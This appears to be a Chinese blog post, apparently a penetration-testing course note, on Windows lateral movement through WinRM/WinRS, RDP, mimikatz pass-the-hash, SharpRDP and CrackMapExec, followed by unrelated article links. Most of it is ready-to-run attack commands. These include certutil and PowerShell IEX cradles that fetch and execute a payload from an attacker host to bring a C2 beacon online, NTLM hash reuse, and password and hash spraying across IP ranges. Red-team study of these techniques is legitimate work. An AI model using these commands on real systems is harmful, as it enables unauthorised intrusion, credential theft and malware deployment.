当前位置: 首页 > news >正文

第180天:横向移动篇入口切换SMB共享WMI管道DCOM组件Impacket套件CS插件

横向移动主要是基于以下三块内容
基于口令
ipc smb wi dcom winrs winrm rdp等
pth ptt ptk

基于漏洞
域控提取漏洞 Exchange漏洞攻防

基于配置
委派 dysnc asrep kerberos攻击 ntlmreply

wimrn

WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。WinRS是内置的命令行工具,用于远程连接运行WinRM的服务器并执行大多数cmd命令
参考:https://cloud.tencent.com/developer/article/1802241
利用条件:
1、win 2012之前利用需要手动开启winRM ,在win 2012之后(包括win 2012)的版本是默认开启的,
2、防火墙对5986、5985端口开放。
开启命令:

winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:
端口扫描5985
2.连接执行:通过winrs来执行远程命令

shell winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
shell winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线C2:

shell winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"

4.CS内置:

winrm winrm64
image

5.其他解决:通过winrm.cmd来进行命令执行 (前几种的方式可能会报错啥的)

shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"} -r:sqlserver -u:sqlserver\administrator -p:admin!@#45

端口5985

RDP横向移动

远程桌面服务 支持明文及HASH连接 端口3389
条件:对方开启RDP服务 远程桌面
rdp通过mimikatz,进行把hash值传到被控机,然后用被控机进行横向移动(需要获得被控机的图形化控制页面),但是连接的时候还远程的电脑还需要支持受限管理模式,
image

mimikatz(HASH连接)

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

SharpRDP(明文连接)

https://github.com/0xthirteen/SharpRDP
是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。

SharpRDP.exe computername=192.168.3.32 command="powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.31:83/a'))\"" username=Administrator password=admin!@#45

image

CrackMapExec

内网喷洒非常重要的一款工具
CME
Github:https://github.com/Porchetta-Industries/CrackMapExec
官方手册:https://www.crackmapexec.wiki/
使用案例:https://www.cnblogs.com/Yang34/p/14411497.html
kali自带,需要配置proxychains4.conf
主要需要注意本地登录和域内登录 以及可以指定域
--local-auth 本地

proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c #域用户HASH登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth #本地用户明文登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth -x "whoami" #本地用户明文登录并执行命令
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth #本地用户HASH登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p pass.txt --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c --local-auth --users
http://www.gsyq.cn/news/39838.html

相关文章:

  • 利用地名来查询烟台市未来七天天气预报,在jmeter中查看响应结果
  • 高效学习方式——知识关联性
  • 2025年云南做楼体灯光亮化服务商权威推荐榜单:云南做酒店灯光亮化/云南做居民楼灯光亮化/云南做写字楼灯光亮化服务商精选
  • 模板Project10
  • [Python刷题记录]-三数之和-双指针-中等
  • 使用Node.js开发MCP服务器入门总结
  • 2025年菊花种苗生产厂家权威推荐榜单:菊花造型/菊花花坛/菊花种苗基地源头厂家精选
  • go语言获取腾讯股票示例
  • 2025年11月低氮燃烧器品牌前十排名:权威评测与行业洞察
  • 2025年外墙保温装饰一体板厂家推荐:浙江欣阳嘉茂控股集团,保温装饰一体板/保温装饰板/金属保温装饰一体板/薄陶瓷保温装饰一体板/多品类适配建筑需求
  • 如何申请和设置400电话系统?
  • 传图取字小程序:高效 OCR 文字识别工具,轻松实现图片转文字
  • 如何优化智能客服平台的服务流程?技巧分享!
  • Grafana12安装部署
  • 11.4联考总结
  • 维语视频微信小程序系统:一站式视频服务解决方案
  • 永久配置 Gradle 输出编码(彻底解决)
  • 图的dfs和bfs遍历
  • 2025年热风炉品厂家/工厂排名前十:徐州海德测热风炉领跑行业
  • 2025年融资顾问服务内容权威排行榜,上市融资顾问哪个好
  • 2025年列管换热器批发厂家权威推荐榜单:不锈钢列管换热器/冷凝器/列管式冷凝器源头厂家精选
  • 2025 年 11 月强力塑料粉碎机,工业塑料粉碎机,多功能塑料粉碎机厂家最新推荐,实力品牌深度解析采购无忧之选!
  • 从零开始学Flink:事件驱动
  • 终端里的 AI 编程助手:OpenCode 使用指南
  • WPF根本布局容器与控件
  • uni-app x开发商城系统,资讯详情页面数据渲染
  • 2025年重庆3.7米小卡服务商权威推荐榜单:重庆3.8米小卡/重庆4.2米轻卡/重庆货车源头服务商精选
  • StockTV API与其他主流数据源(如Yahoo Finance、Alpha Vantage)相比有哪些具体优势?
  • Pycharm复制项目的一个注意事项
  • 2025 年 11 月防腐球墨铸铁管,给水球墨铸铁管,水利工程用球墨铸铁管厂家最新推荐,实力品牌深度解析采购无忧之选!